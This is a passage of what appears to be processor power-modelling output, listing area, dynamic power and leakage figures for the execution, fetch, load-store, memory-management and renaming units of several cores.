'Load Store Unit/Data Cache/Runtime Dynamic': 1.17538,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0786785,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0786784,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.04058,
'Load Store Unit/Runtime Dynamic': 1.64207,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.194008,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.388015,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.068854,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0690198,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.2651,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0311681,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.539488,
'Memory Management Unit/Runtime Dynamic': 0.100188,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.7184,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.164097,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0121383,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.112205,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.28844,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.61318,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 4.34557e-05,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202723,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.000283364,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.325217,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.524563,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.264782,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.11456,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.37191,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.55131,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 5.35336e-05,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0136411,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0986563,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.100884,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0987098,
'Execution Unit/Register Files/Runtime Dynamic': 0.114525,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.207852,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.653801,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.49099,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00156156,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00156156,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00137889,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000544058,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00144921,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00595121,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0143013,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0969823,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.16891,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.266469,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.329396,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.68681,
'Instruction Fetch Unit/Runtime Dynamic': 0.713099,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0176904,
'L2/Runtime Dynamic': 0.00582802,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.82544,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.73116,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.116091,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.116091,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.37365,
'Load Store Unit/Runtime Dynamic': 2.41977,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.28626,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.57252,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.101595,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.101837,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.38356,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0437524,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.714191,
'Memory Management Unit/Runtime Dynamic': 0.145589,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 22.9331,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.000140806,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0146746,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.171728,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.186543,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.96182,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0829041,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.267805,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.585579,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.13007,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.209799,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.105899,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.445769,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0589843,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.89094,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.110629,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00545574,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0648838,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0403485,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.175512,
'Execution Unit/Register Files/Runtime Dynamic': 0.0458043,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.157423,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.360984,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.52574,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 8.27178e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 8.27178e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 7.15674e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 2.74425e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00057961,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000816613,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00081023,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0387881,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.46725,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0781678,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.131742,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.80551,
'Instruction Fetch Unit/Runtime Dynamic': 0.250324,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0998419,
'L2/Runtime Dynamic': 0.0610905,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
